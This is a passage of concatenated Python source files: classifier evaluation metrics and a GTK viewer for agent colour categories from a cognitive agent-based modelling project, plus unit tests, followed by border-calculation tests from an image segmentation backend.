return (tp * tn - fp * fn) / \
math.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
def correct(classifier, samples):
return math.fsum([int(classifier.classify(s) == s.get_cls())
for s in samples]) / len(samples)
ClassifiedSample = namedtuple("ClassifiedSample", "sample cls distribution")
def classify_samples(classifier, samples):
def tmp(sample):
d = classifier.class_probabilities(sample)
cls = classifier.classify(sample)
return ClassifiedSample(sample, cls, d)
return map(tmp, samples)
def group_by_classes(samples, key=lambda s: s.get_cls()):
''' This function groups samples into sets containing the same class
IMPORTANT:
**This will skip empty classes (it takes them from samples)**
'''
s = sorted(samples, key=key)
return dict(((cls, list(l)) for cls, l in groupby(s, key=key)))
def ROC(classifier, samples, positive_class):
return _ROC(classify_samples(classifier, samples), positive_class)
def _ROC(classified_test_samples, positive_class):
key = lambda classified_sample: \
classified_sample.distribution.get(positive_class, 0.)
L = sorted(classified_test_samples, key=key, reverse=True)
res = []
fp, tp = 0., 0.
prev_prob = -1 # this guarantee that (0, 0) will be in resulting list
for sample, classifier_class, distrib in L:
prob = distrib.get(positive_class, 0.)
if prob != prev_prob:
res.append((fp, tp))
prev_prob = prob
if sample.get_cls() == positive_class:
tp += 1
else:
fp += 1
res.append((fp, tp))
if tp == 0:
tp = 1
# this is dirty hack - there were no positive samples in data
# so eighter way we will get there 0
if fp == 0:
fp = 1
return [(x / fp, y / tp) for x, y in res]
def AUCROC_weighting(gbc):
N = math.fsum([len(samples) for _, samples in gbc.iteritems()])
N2 = N * N
waucs = [(len(samples1) * len(samples2) / N2, calc_auc(_ROC(samples1 + samples2, cls1)))
for (cls1, samples1), (cls2, samples2) in combinations(gbc.items(), 2)]
wsum = math.fsum((x[0] for x in waucs))
# TODO can wsum be 0? what if?
return math.fsum(map(lambda x: x[0] * x[1], waucs)) / wsum
def AUCROC_nonweighting(gbc):
return avg([calc_auc(_ROC(samples1 + samples2, cls1))
for (cls1, samples1), (cls2, samples2) in combinations(gbc.items(), 2)])
def AUCROC(classifier, test_samples, weighted=False):
''' Weighted version seems to be more common...
but is computationally more expensive
'''
classified_samples = classify_samples(classifier, test_samples)
if filter(lambda cs: cs.cls is None, classified_samples):
return 0.
gbc = group_by_classes(classified_samples, key=lambda cs: cs.sample.get_cls())
if weighted:
f = AUCROC_weighting
else:
f = AUCROC_nonweighting
return f(gbc)
def classifier_single_performance(classifier, train, test, measure):
''' Trains and evaluates classifier on given test sets
'''
classifier.train(train)
return measure(classifier, test)
def avg_classifier_performance(classifier, data_sets, measure):
''' Returns average and std dev of classifier performance over
train and test sets using given measure
'''
return calc_std([classifier_single_performance(classifier,
train, test, measure) for train, test in data_sets])
def aucroc_avg_classifier_performance(classifier, data_sets):
''' This is defined just because this might be used quite often
'''
return avg_classifier_performance(classifier, data_sets, AUCROC)
```
#### File: src/presenter/munsell_palette.py
```python
import sys
sys.path.append('../')
import os
import pygtk
pygtk.require("2.0")
import gtk
import pango
import copy
from presenter import grapefruit
from cog_abm.extras.color import *
from cog_abm.core.result import *
from steels.steels_experiment import *
#from steels.analyzer import *
from time import time
argmax = lambda funct, items: max(izip(imap(funct, items), items))
argmin = lambda funct, items: min(izip(imap(funct, items), items))
def str2bool(v):
return v.lower() in ["yes", "true", "t", "y", "1"]
CELLAR_SPACE = 1
CELLAR_SIZE = 15
PANGO_FONT = "normal 7"
AGENTS_CONTAINERS_IN_ROW = 2
MAIN_CONTAINER_REQUESTED_HEIGHT = 600
MAIN_CONTAINER_REQUESTED_WIDTH = 1200
class AgentData(object):
def __init__(self, cielab, find_focal):
self.cielab = cielab
self.painted = []
self.focals = []
self.ff = find_focal
def handle_categories(self, iter, agent):
#start_time = time()
self.painted.append(range(330))
self.focals.append({})
if (iter == 0):
return
dictionary = {}
category_set = [agent.state.classify(stimuli)
for stimuli in self.cielab]
#print category_set
for i in xrange(len(category_set)):
if category_set[i] not in dictionary:
dictionary[category_set[i]] = []
dictionary[category_set[i]].append(i)
#focal_time = time()
focals = self.focals[iter]
#print dictionary
for key, set in dictionary.iteritems():
if (self.ff == "normal"):
#print "normal"
focal = self.find_focal_point(set)
#elif (key <> None):
else:
focal = self.strength_find_focal_point(agent, key,
category_set, set)
focals[focal] = None
self.set_focal(iter, set, focal)
#print "Focal handling lasts %f - %f percent of handling category time." % (float(time() - focal_time), float((time() - focal_time)/(time() - start_time)))
def set_focal(self, iter, category_set, focal):
painted = self.painted[iter]
for i in xrange(len(category_set)):
painted[category_set[i]] = focal
def find_focal_point(self, index_set):
focal = index_set[0]
f_sum = float('inf')
for i in index_set:
c = self.cielab[i]
sum = math.fsum(
[c.distance(self.cielab[j]) for j in index_set])
if sum < f_sum:
f_sum = sum
focal = i
return focal
def strength_find_focal_point(self, agent, key, category_set, values):
max = - float('inf')
focal = category_set[0]
#print key, category_set, values
for val in values:
strength = agent.state.sample_strength(key,
self.cielab[val])
if strength > max:
max = strength
focal = val
return focal
def get_number_of_categories(self, iter):
return len(self.focals[iter])
class AgentDataWithLanguage(AgentData):
def __init__(self, cielab, find_focal = "normal"):
super(AgentDataWithLanguage, self).__init__(cielab, find_focal)
self.names = []
self.focal_names = []
def handle_categories(self, iter, agent):
#start_time = time()
self.painted.append(range(330))
self.focals.append({})
self.focal_names.append({})
self.names.append(range(330))
if (iter == 0):
return
dictionary = {}
category_set = [agent.state.classify(stimuli)
for stimuli in self.cielab]
#print category_set
for i in xrange(len(category_set)):
if category_set[i] not in dictionary:
dictionary[category_set[i]] = []
dictionary[category_set[i]].append(i)
#focal_time = time()
focals = self.focals[iter]
focal_names = self.focal_names[iter]
for key, set in dictionary.iteritems():
if (self.ff == "normal"):
#print "normal"
focal = self.find_focal_point(set)
#elif key <> None:
else:
focal = self.strength_find_focal_point(agent, key,
category_set, set)
name = str(agent.state.word_for(key))
#two dictionaries for better performance
focals[focal] = name
focal_names[name] = focal
self.set_focal(iter, set, focal, name)
def set_focal(self, iter, category, focal, name):
#self.names.append(range(330))
names = self.names[iter]
painted = self.painted[iter]
for i in xrange(len(category)):
painted[category[i]] = focal
names[category[i]] = name
class Population(AgentDataWithLanguage):
def handle_categories(self, iter, agents_data):
#self.focals[iter] -> {focal} = name
#self.names[iter] -> {color} = name
#self.focal_names[iter] -> {name} = focal
#print "Iter: ", iter
names_iter = range(330)
self.names.append(names_iter)
focals_names_iter = {}
self.focal_names.append(focals_names_iter)
focals_iter = {}
self.focals.append(focals_iter)
self.painted.append(range(330))
painted = self.painted[iter]
if (iter == 0):
return
#all agents focals in category: key: category_name, value: list_of_focals
category_set = {}
#setting name for each color_square
for color_nr in xrange(len(names_iter)):
name_counter = {} #counts names for color for each name
for agent in agents_data:
iter_names = agent.names[iter]
name = iter_names[color_nr]
if name <> str(None):
if name in name_counter:
name_counter[name] += 1
else:
name_counter[name] = 1
best_name = 'None'
temp_sum = -1
for name, sum in name_counter.iteritems():
if sum > temp_sum:
best_name = name
temp_sum = sum
names_iter[color_nr] = best_name
if best_name not in category_set:
category_set[best_name] = []
category_set[best_name].append(color_nr)
#print category_set
#print names_iter
focal_counter = {}
#setting focals data in each category
for name in category_set:
counter = {}
for agent in agents_data:
iter_focal_names = agent.focal_names[iter]
if name in iter_focal_names:
focal = iter_focal_names[name]
#if focal of this agent appear in right population category
if names_iter[focal] == name:
if focal in focal_counter:
counter[focal] += 1
else:
counter[focal] = 1
#print names_iter[focal], name
#focals
#category_set[name].append(focal)
focal_counter[name] = counter
#print focal_counter
#print names_dic_iter
#setting nearest focal (to other focals) in each category
for name, counter in focal_counter.iteritems():
#focals =category_set?[name]
#counter = focal_counter[name]
min = float('inf')
if len(counter.keys()) == 0:
for color in category_set[name]:
c = self.cielab[color]
sum = math.fsum([c.distance(self.cielab[col])
for col in category_set[name]])
if sum < min:
min = sum
foc = color
else:
for focal in counter:
c = self.cielab[focal]
sum = math.fsum([c.distance(self.cielab[foc])*counter[foc]
for foc in counter])
if sum < min:
min = sum
foc = focal
focals_names_iter[name] = foc
focals_iter[foc] = name
#print "Names_iter:", names_iter, "/n"
#print "focals_iter:", focals_iter, "/n"
#setting colors
for i in xrange(len(painted)):
painted[i] = focals_names_iter[names_iter[i]]
class WCSPalette(object):
def __init__(self, colors):
self.colors = copy.copy(colors)
self.CELLAR_SPACE = CELLAR_SPACE
self.CELLAR_SIZE = CELLAR_SIZE
self.area = gtk.DrawingArea()
self.area.set_size_request(42 * (self.CELLAR_SIZE + self.CELLAR_SPACE),
10 * (self.CELLAR_SIZE + self.CELLAR_SPACE))
self.area.connect("expose-event", self.area_expose)
self.pangolayout = self.area.create_pango_layout("")
self.pangolayout.set_font_description(pango.
FontDescription(PANGO_FONT))
def area_expose(self, area, event):
#self.style = self.area.get_style()
#self.gc = self.style.fg_gc[gtk.STATE_NORMAL]
#self.gc = self.area.window.new_gc()
self.paint_cellars()
def show(self):
self.area.show()
def paint_cellars(self, iter=0, paintable=range(330)):
self.current_iteration = iter
self.gc = self.area.window.new_gc(line_width=2)
self.area.window.clear()
for i in xrange(320):
col = (2+i%40)*(self.CELLAR_SIZE + self.CELLAR_SPACE)
row = (1+i/40)*(self.CELLAR_SIZE + self.CELLAR_SPACE)
self.gc.set_rgb_fg_color(self.colors[paintable[i]])
self.area.window.draw_rectangle(self.gc, True, col, row,
self.CELLAR_SIZE, self.CELLAR_SIZE)
for i in xrange(10):
self.gc.set_rgb_fg_color(self.colors[paintable[320+i]])
self.area.window.draw_rectangle(self.gc, True, 1, i*
(self.CELLAR_SIZE + self.CELLAR_SPACE)+1, self.CELLAR_SIZE,
self.CELLAR_SIZE)
self.paint_category_borders(paintable)
self.create_palette_labels()
def paint_category_borders(self, paintable):
self.gc.set_rgb_fg_color(gtk.gdk.color_parse("black"))
space = self.CELLAR_SIZE + self.CELLAR_SPACE
self.area.window.draw_rectangle(self.gc, False, 1, 1,
self.CELLAR_SIZE, 10*(self.CELLAR_SIZE) + 9*self.CELLAR_SPACE)
self.area.window.draw_rectangle(self.gc, False, 2*space, space,
40*self.CELLAR_SIZE +39*self.CELLAR_SPACE, 8*self.CELLAR_SIZE
+ 7*self.CELLAR_SPACE)
#paint column lines
for i in xrange(8):
index =i*40
for j in xrange(39):
if (paintable[index] is not paintable[index+1]):
self.area.window.draw_line(self.gc, (3+j)*space-1,
(1+i)*space-1, (3+j)*space-1, (2+i)*space-1)
index += 1
#paint row lines
for i in xrange(7):
index = i*40
for j in xrange(40):
if (paintable[index] is not paintable[index+40]):
self.area.window.draw_line(self.gc, (2+j)*space-1,
(2+i)*space-1, (3+j)*space-1, (2+i)*space-1)
index += 1
#paint row lines in side box
index = 319
for i in xrange(9):
index += 1
if (paintable[index] is not paintable[index+1]):
self.area.window.draw_line(self.gc, 0, (1+i)*space,
space-1, (1+i)*space)
def create_palette_labels(self):
space = self.CELLAR_SIZE + self.CELLAR_SPACE
self.gc.set_rgb_fg_color(gtk.gdk.color_parse("black"))
for i in xrange(1, 41):
col = (1 + i) * space
row = 0
self.pangolayout.set_text(str(i))
self.area.window.draw_layout(self.gc, col+2, row+3,
self.pangolayout)
for i in xrange(10):
self.pangolayout.set_text(chr(65 + i))
self.area.window.draw_layout(self.gc, space+2, i*space+2,
self.pangolayout)
class WCSAgent(WCSPalette):
def __init__(self, colors):
super(WCSAgent, self).__init__(colors)
self.current_iteration = 0
self.agent_data = None
def get_number_of_categories(self, iter):
if self.agent_data is None:
return 0
return self.agent_data.get_number_of_categories(iter)
def set_agent_data(self, agent_data):
self.agent_data = agent_data
def area_expose(self, area, event):
#self.gc = self.area.window.new_gc()
self.paint_cellars(self.current_iteration)
def paint_cellars(self, iter=0):
super(WCSAgent, self).paint_cellars(iter, self.agent_data.painted[iter])
self.paint_focals(self.agent_data.focals[iter])
def paint_focals(self, focals):
#print "paint focals", focals
circle_size = self.CELLAR_SIZE-1
wheel_size = self.CELLAR_SIZE-1
for i, name in focals.iteritems():
if i < 320:
col = (2+i%40)*(self.CELLAR_SIZE + self.CELLAR_SPACE)
row = (1+i/40)*(self.CELLAR_SIZE + self.CELLAR_SPACE)
self.gc.set_rgb_fg_color(gtk.gdk.color_parse("black"))
self.area.window.draw_arc(self.gc, False, col, row,
circle_size, circle_size, 0, 23040)#360*64)
self.gc.set_rgb_fg_color(gtk.gdk.color_parse("white"))
self.area.window.draw_arc(self.gc, True, col, row,
wheel_size, wheel_size, 0, 23040)#360*64)
else:
self.gc.set_rgb_fg_color(gtk.gdk.color_parse("black"))
self.area.window.draw_arc(self.gc, False, 1, (i-320)*(self.
CELLAR_SIZE + self.CELLAR_SPACE)+1, circle_size,
circle_size, 0, 23040)
self.gc.set_rgb_fg_color(gtk.gdk.color_parse("white"))
self.area.window.draw_arc(self.gc, True, 1, (i-320)*(self.
CELLAR_SIZE + self.CELLAR_SPACE)+1, wheel_size,
wheel_size, 0, 23040)
class WCSAgentWithLegend(WCSAgent):
def __init__(self, colors):
super(WCSAgentWithLegend, self).__init__(colors)
self.legend = gtk.DrawingArea()
self.legend.connect("expose-event", self.legend_expose)
def area_expose(self, area, event):
#self.gc = self.area.window.new_gc()
self.paint_cellars(self.current_iteration)
def paint_cellars(self, iter=0):
super(WCSAgentWithLegend, self).paint_cellars(iter)
self.paint_legend(iter, self.agent_data.focals[iter])
def legend_expose(self, area, event):
self.gc = self.legend.window.new_gc()
self.paint_legend(self.current_iteration,
self.agent_data.focals[self.current_iteration])
def paint_legend(self, iter, focals = {}):
self.current_iteration = iter
self.gc = self.legend.window.new_gc()
self.legend.window.clear()
column = 0
row = self.CELLAR_SPACE
counter = 0
#focals = self.agent_data.focals[iter]
for nr, name in focals.iteritems():
counter += 1
if (counter == 22):
row += 2*self.CELLAR_SIZE
counter = 0
column = 0
self.gc.set_rgb_fg_color(self.colors[nr])
column += 2*self.CELLAR_SIZE
self.legend.window.draw_rectangle(self.gc, True, column, row,
self.CELLAR_SIZE, self.CELLAR_SIZE)
self.gc.set_rgb_fg_color(gtk.gdk.color_parse("black"))
self.pangolayout.set_text(name)
self.legend.window.draw_layout(self.gc, column, row +
self.CELLAR_SIZE, self.pangolayout)
class MunsellPaletteInterface(object):
def __init__(self, path, agents_viewed, find_focal):
self.window = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.window.set_title("Agent colour categories map")
self.window.set_position(gtk.WIN_POS_CENTER)
self.window.set_default_size(1280,-1)
self.iterations = []
self.stimuli = []
self.colors = []
self.agents_data = []
start_time = time()
self.init_wcs_template()
self.agent_WCSTable = []
self.get_results_from_folder(path)
print "Processing data..."
self.set_agents_data(find_focal)
print 'Done in:', time() - start_time,'s'
self.main_vbox = gtk.VBox(False, 2)
#self.template = WCSPalette(self.colors)
#self.main_vbox.add(self.template.area)
self.create_containers(agents_viewed)
self.main_vbox.add(self.scrolled_window)
self.init_WCSTable_to_agent_data()
self.panel = self.create_panel()
self.main_vbox.add(self.panel)
self.window.add(self.main_vbox)
if (self.window):
self.window.connect("destroy", gtk.main_quit)
self.window.show_all()
self.set_current_iteration_widgets(0)
def set_agents_data(self, find_focal):
for i in xrange(self.agents_size):
self.agents_data.append(AgentData(self.stimuli, find_focal))
for j in xrange(len(self.iterations)):
agent = self.result_set[j]
for i in xrange(len(agent)):
self.agents_data[i].handle_categories(j, agent[i])
def get_results_from_folder(self, path):
print "From: ", path
self.result_set = []
list = os.listdir(path)
for file in list:
(root, ext) = os.path.splitext(file)
if (ext == ".pout"):
print "Reading:", file
self.result_set.append(self.get_iteration_from_file
(os.path.join(path, file)))
zipped = zip(self.iterations, self.result_set)
zipped.sort()
(self.iterations, self.result_set) = zip(*zipped)
def get_iteration_from_file(self, source):
with open(source, 'r') as file:
tuple = cPickle.load(file)
self.iterations.append(tuple[0])
agents = tuple[1]
#constant number of agents for every iteration
self.agents_size = len(agents)
return agents
def init_wcs_template(self):
self.stimuli = get_WCS_colors()
for color in self.stimuli:
r, g, b, _ = self.convert_to_RGB(color)
self.colors.append(gtk.gdk.Color(r, g, b))
#print [self.stimuli[j].distance(self.stimuli[j+1]) for j in xrange(len(self.stimuli)-2)]
def create_containers(self, agent_viewed):
self.cat_size_labels = []
row = (agent_viewed-1)/2 +2
self.container = gtk.Table(row, AGENTS_CONTAINERS_IN_ROW, True)
self.container.set_row_spacings(6)
self.container.set_col_spacings(6)
wcs_palette = WCSPalette(self.colors)
self.container.attach(wcs_palette.area, 0, 1, 0, 1)
for i in xrange(agent_viewed):
r = i / AGENTS_CONTAINERS_IN_ROW + 1
c = i % AGENTS_CONTAINERS_IN_ROW
self.container.attach(self.create_agent_panel(i), c, c+1, r, r+1)
self.scrolled_window = gtk.ScrolledWindow()
self.scrolled_window.add_with_viewport(self.container)
self.scrolled_window.set_size_request(MAIN_CONTAINER_REQUESTED_WIDTH,
MAIN_CONTAINER_REQUESTED_HEIGHT)
def create_agent_panel(self, number):
combo = gtk.combo_box_new_text()
for i in xrange(self.agents_size):
combo.append_text("Agent " + str(i))
combo.set_active(number)
combo.connect('changed', self.changed_cb, number)
combo.set_size_request(50, 30)
cat_size_label = gtk.Label()
self.cat_size_labels.append(cat_size_label)
table = gtk.Table(2, 2, False)
table.attach(combo, 0, 1, 0, 1)
table.attach(cat_size_label, 1, 2, 0, 1)
wcs_table = WCSAgent(self.colors)
self.agent_WCSTable.append(wcs_table)
panel = gtk.VPaned()
panel.pack1(table)
panel.pack2(wcs_table.area)
#panel.show()
return panel
def create_panel(self):
self.close_button = gtk.Button("Close")
self.close_button.connect("clicked", gtk.main_quit)
self.close_button.set_size_request(150, 40)
#self.close_button.show()
self.scroll = gtk.HScrollbar()
self.scroll.set_size_request(150, 40)
self.scroll.set_update_policy(gtk.UPDATE_CONTINUOUS)
self.scroll.set_adjustment(gtk.Adjustment(0, 0,
len(self.iterations)-1, 1, 1, 0))
self.scroll.connect("value-changed", self.scroll_value_changed)
self.iteration_label = gtk.Label()
#self.scroll.show()
vbox = gtk.VBox(True, 2)
vbox.pack_start(self.iteration_label)
vbox.pack_start(self.scroll)
panel = gtk.Table(1, 3, True)
panel.set_col_spacings(15)
panel.attach(self.close_button, 2, 3, 0, 1)
panel.attach(vbox, 1, 2, 0, 1)
return panel
def changed_cb(self, combobox, cb_number):
index = combobox.get_active()
self.agent_WCSTable[cb_number].set_agent_data(self.agents_data[index])
self.agent_WCSTable[cb_number].paint_cellars(self.current_iteration)
self.cat_size_labels[cb_number].set_text("Number of categories: " +
str(self.agent_WCSTable[cb_number].get_number_of_categories
(self.current_iteration)))
def scroll_value_changed(self, scroll):
if (self.current_iteration is int(scroll.get_value())):
return
self.set_current_iteration_widgets(int(scroll.get_value()))
for i in xrange(len(self.agent_WCSTable)):
self.agent_WCSTable[i].paint_cellars(self.current_iteration)
def set_current_iteration_widgets(self, iter):
self.current_iteration = iter
self.scroll.set_value(iter)
self.iteration_label.set_text("Population iterations: "+
str(self.iterations[iter]))
for i in xrange(len(self.agent_WCSTable)):
self.cat_size_labels[i].set_text("Number of categories: " +
str(self.agent_WCSTable[i].get_number_of_categories(iter)))
def init_WCSTable_to_agent_data(self):
for tuple in zip(self.agents_data, self.agent_WCSTable):
tuple[1].set_agent_data(tuple[0])
def convert_to_RGB(self, color):
#c1 = grapefruit.Color.NewFromLab(color.L, color.a/100, color.b/100, wref=grapefruit.Color.WHITE_REFERENCE['std_D50'])
#c2 = grapefruit.Color.NewFromLab(color.L, color.a/100, color.b/100, wref=grapefruit.Color.WHITE_REFERENCE['std_D65'])
#if c1 is c2:
# print c1, c2
return grapefruit.Color.NewFromLab(color.L,
color.a/100, color.b/100, wref=grapefruit.Color.
WHITE_REFERENCE['std_D65'])
def main(self):
gtk.main()
class MunsellPaletteInterfaceWithLanguage(MunsellPaletteInterface):
def set_agents_data(self, find_focal):
for i in xrange(self.agents_size):
self.agents_data.append(AgentDataWithLanguage(self.stimuli,
find_focal))
self.population = Population(self.stimuli)
for j in xrange(len(self.iterations)):
agent = self.result_set[j]
for i in xrange(len(agent)):
try:
self.agents_data[i].handle_categories(j, agent[i])
except:
print "Could not handle agent categories:",
sys.exc_info()[0]
#sys.exit()
self.population.handle_categories(j, self.agents_data)
def create_containers(self, agent_viewed):
super(MunsellPaletteInterfaceWithLanguage,
self).create_containers(agent_viewed)
self.container.attach(self.create_population_view(), 1, 2, 0, 1)
def create_agent_panel(self, number):
combo = gtk.combo_box_new_text()
for i in xrange(self.agents_size):
combo.append_text("Agent " + str(i))
combo.set_active(number)
combo.connect('changed', self.changed_cb, number)
combo.set_size_request(50, 30)
cat_size_label = gtk.Label()
self.cat_size_labels.append(cat_size_label)
table = gtk.Table(2, 2, False)
table.attach(combo, 0, 1, 0, 1)
table.attach(cat_size_label, 1, 2, 0, 1)
wcs_table = WCSAgentWithLegend(self.colors)
window = gtk.ScrolledWindow()
window.add_with_viewport(wcs_table.legend)
window.set_size_request(-1, 50)
window.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
table.attach(window, 0, 2, 1, 2)
self.agent_WCSTable.append(wcs_table)
panel = gtk.VPaned()
panel.pack1(table)
panel.pack2(wcs_table.area)
#panel.show()
return panel
def create_population_view(self):
self.population_cat_label = gtk.Label()
name_label = gtk.Label("Population")
table = gtk.Table(2, 2, False)
table.attach(self.population_cat_label, 1, 2, 0, 1)
table.attach(name_label, 0, 1, 0, 1)
wcs_table = WCSAgentWithLegend(self.colors)
window = gtk.ScrolledWindow()
window.add_with_viewport(wcs_table.legend)
window.set_size_request(-1, 50)
window.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
table.attach(window, 0, 2, 1, 2)
self.population_view = wcs_table
panel = gtk.VPaned()
panel.pack1(table)
panel.pack2(wcs_table.area)
#panel.show()
return panel
def scroll_value_changed(self, scroll):
if (self.current_iteration is int(scroll.get_value())):
return
super(MunsellPaletteInterfaceWithLanguage,
self).scroll_value_changed(scroll)
self.population_view.paint_cellars(self.current_iteration)
def set_current_iteration_widgets(self, iter):
super(MunsellPaletteInterfaceWithLanguage,
self).set_current_iteration_widgets(iter)
self.population_cat_label.set_text("Number of categories: " + str(self.
population.get_number_of_categories(self.current_iteration)))
def init_WCSTable_to_agent_data(self):
super(MunsellPaletteInterfaceWithLanguage, self). \
init_WCSTable_to_agent_data()
self.population_view.set_agent_data(self.population)
if __name__ == "__main__":
import optparse
optp = optparse.OptionParser()
optp.add_option('-a','--agents', action="store", dest='agents', type="int",
help="Number of agents viewed", default=10)
optp.add_option('-d','--directory', action="store", dest='directory',
type="string", help="Directory with input data")
optp.add_option('-f','--findfocal', action="store", type="string",
dest="find_focal", help="Determines which 'find_focal' algorithm will \
be used ('normal' as default or 'strength_based')", default="normal")
optp.add_option('-l', '--legend', action="store", type="string", dest=
"legend", help="Type true to show language sharing", default="false")
# Parse the arguments (defaults to parsing sys.argv).
opts, args = optp.parse_args()
if (str2bool(opts.legend) == 1):
mpi = MunsellPaletteInterfaceWithLanguage(opts.directory, opts.agents,
opts.find_focal)
else:
mpi = MunsellPaletteInterface(opts.directory, opts.agents,
opts.find_focal)
mpi.main()
```
#### File: src/test/test_agent_state.py
```python
import sys
sys.path.append('../')
import unittest
from cog_abm.agent.state import *
class TestAgentState(unittest.TestCase):
def setUp(self):
pass
if __name__ == '__main__':
unittest.main()
```
#### File: src/test/test_ml_core.py
```python
import math
import random
import unittest
from cog_abm.ML.core import (NominalAttribute, NumericAttribute, Sample,
load_samples_arff, split_data, split_data_cv)
animals = ["dog", "cat", "lion", "duck", "python:)"]
class TestAttributes(unittest.TestCase):
def setUp(self):
self.symbols = animals
self.na = NominalAttribute(self.symbols)
def test_numeric_attr_getting_value(self):
na = NumericAttribute()
for i in xrange(10):
self.assertEqual(i, na.get_value(i))
def test_nominal_attr_getting_value(self):
na = NominalAttribute(self.symbols)
for i, s in enumerate(self.symbols):
self.assertEqual(s, na.get_value(i))
self.assertEqual(s, na.get_symbol(i))
self.assertEqual(i, na.get_idx(s))
def test_equality(self):
self.assertEqual(self.na, NominalAttribute(animals))
self.assertEqual(self.na,
NominalAttribute(["dog", "cat", "lion", "duck", "python:)"]))
self.assertNotEqual(self.na, NominalAttribute(animals + ["donkey"]))
self.assertEqual(NumericAttribute(), NumericAttribute())
self.assertNotEqual(self.na, NumericAttribute())
class TestSample(unittest.TestCase):
def setUp(self):
self.meta = [NumericAttribute(), NominalAttribute(animals)]
self.sample = Sample([1.2, self.meta[1].get_idx("dog")], self.meta)
self.meta_cl = NominalAttribute(animals)
self.sample_cl = Sample([100, self.meta[1].get_idx("cat")], self.meta,
self.meta_cl.get_idx("duck"), self.meta_cl)
def test_basic(self):
self.assertIsNone(self.sample.get_cls())
self.assertEqual(self.sample_cl.get_cls(), "duck")
self.assertEqual(self.sample.get_values(), [1.2, "dog"])
self.assertEqual(self.sample_cl.get_values(), [100, "cat"])
def test_equality(self):
self.assertNotEqual(self.sample, self.sample_cl)
meta = [NumericAttribute(), NominalAttribute(animals)]
sample = Sample([1.2, meta[1].get_idx("dog")], meta)
self.assertEqual(self.sample, sample)
self.assertNotEqual(self.sample, self.sample_cl)
meta = [NumericAttribute(), NominalAttribute(animals), NumericAttribute()]
sample = Sample([1.2, meta[1].get_idx("dog"), 3.14], meta)
self.assertNotEqual(self.sample, sample)
self.assertNotEqual(self.sample_cl, sample)
meta = [NumericAttribute(), NominalAttribute(animals)]
sample = Sample([1.2, meta[1].get_idx("cat")], meta)
self.assertNotEqual(self.sample, sample)
self.assertNotEqual(self.sample_cl, sample)
sample = Sample([1.3, meta[1].get_idx("dog")], meta)
self.assertNotEqual(self.sample, sample)
self.assertNotEqual(self.sample_cl, sample)
sample = Sample([100, self.meta[1].get_idx("cat")], self.meta,
self.meta_cl.get_idx("duck"), self.meta_cl)
self.assertEqual(self.sample_cl, sample)
self.assertNotEqual(self.sample, sample)
sample = Sample([10.20, self.meta[1].get_idx("cat")], self.meta,
self.meta_cl.get_idx("duck"), self.meta_cl)
self.assertNotEqual(self.sample, sample)
self.assertNotEqual(self.sample_cl, sample)
class TestSamplePreparation(unittest.TestCase):
def setUp(self):
self.samples = load_samples_arff("test/iris.arff")
def test_loading_arff(self):
expected_meta = [NumericAttribute() for _ in xrange(4)]
expected_cls_meta = NominalAttribute(
["Iris-setosa", "Iris-versicolor", "Iris-virginica"])
sample = self.samples[0]
self.assertEqual(sample.meta, expected_meta)
self.assertEqual(sample.cls_meta, expected_cls_meta)
def test_spliting_samples(self):
for _ in xrange(100):
split_ratio = random.random()
train, test = split_data(self.samples, split_ratio)
self.assertEqual(math.ceil(len(self.samples) * split_ratio), len(train))
self.assertEqual(len(self.samples), len(train) + len(test))
def test_split_data_cv(self):
N = 100
for _ in xrange(100):
samples = range(N)
folds = random.randint(2, N / 3)
sets = split_data_cv(samples, folds)
for train, test in sets:
for ts in test:
self.assertTrue(ts not in train)
self.assertTrue(N / folds <= len(test) <= N / folds + 1)
self.assertEqual(N, len(test) + len(train))
```
#### File: src/test/test_simulation.py
```python
import sys
sys.path.append('../')
import unittest
from cog_abm.core.simulation import *
class TestSimulation(unittest.TestCase):
def setUp(self):
pass
class TestMultiThreadSimulation(unittest.TestCase):
def setUp(self):
from cog_abm.extras.additional_tools import generate_network_with_agents
from cog_abm.extras.additional_tools import SimpleInteraction
network, agents = generate_network_with_agents(10)
self.network = network
self.agents = agents
print network.agents
print network.nodes
print "___________"
print agents
self.interaction = SimpleInteraction(2)
# def testBasic(self):
# simulation = MultithreadSimulation(3, graph = self.network,
# interaction = self.interaction, agents = self.agents)
#
# simulation.run(1000, 50)
```
#### File: src/test/test_tools.py
```python
import sys
sys.path.append('../')
import unittest
from cog_abm.extras.tools import calc_auc
class TestAucCalculations(unittest.TestCase):
def setUp(self):
pass
def test_auc(self):
test_data = [
([(0, 0), (1, 2), (2, 0)], 2.),
([(0, 1), (1, 1)], 1),
([(0., 0.5), (1, 2), (2, 2.)], 1.25 + 2.)
]
for curve, expected_auc in test_data:
self.assertEqual(expected_auc, calc_auc(curve))
``` |
{
"source": "4DNucleome/PartSegCore-compiled-backend",
"score": 2
} |
#### File: src/tests/test_coloring.py
```python
from itertools import product
import numpy as np
import pytest
from PartSegCore_compiled_backend.color_image_cython import calculate_borders, calculate_borders2d
@pytest.mark.parametrize("label_type", [np.uint8, np.uint16, np.uint32])
def test_calculate_borders(label_type):
layers = np.zeros((1, 10, 10, 10), dtype=label_type)
layers[:, 3:-3, 3:-3, 3:-3] = 1
res = calculate_borders(layers, 0, False)
expected = layers.copy()
expected[:, 4:-4, 4:-4, 4:-4] = 0
assert np.all(res == expected)
res = calculate_borders(layers, 0, True)
expected = layers.copy()
expected[:, :, 4:-4, 4:-4] = 0
assert np.all(res == expected)
res = calculate_borders2d(layers, 0)
assert np.all(res == expected)
@pytest.mark.parametrize("label_type", [np.uint8, np.uint16, np.uint32])
def test_calculate_borders_thick(label_type):
layers = np.zeros((1, 16, 16, 16), dtype=label_type)
layers[:, 3:-3, 3:-3, 3:-3] = 1
res = calculate_borders(layers, 1, False)
expected = np.zeros((1, 16, 16, 16), dtype=np.uint8)
expected[:, 2:-2, 2:-2, 2:-2] = 1
expected[:, 5:-5, 5:-5, 5:-5] = 0
for c1, c2 in product([2, -3], repeat=2):
for x in range(3):
cord = [c1, c2]
cord.insert(x, slice(None))
expected[tuple([0] + cord)] = 0
assert np.all(res == expected)
@pytest.mark.parametrize("label_type", [np.uint8, np.uint16, np.uint32])
def test_calculate_borders_thick2d(label_type):
layers = np.zeros((1, 16, 16, 16), dtype=label_type)
layers[:, 3:-3, 3:-3, 3:-3] = 1
res1 = calculate_borders(layers, 1, True)
res2 = calculate_borders2d(layers, 1)
assert np.all(res1 == res2)
expected = np.zeros((1, 16, 16, 16), dtype=np.uint8)
expected[:, 3:-3, 2:-2, 2:-2] = 1
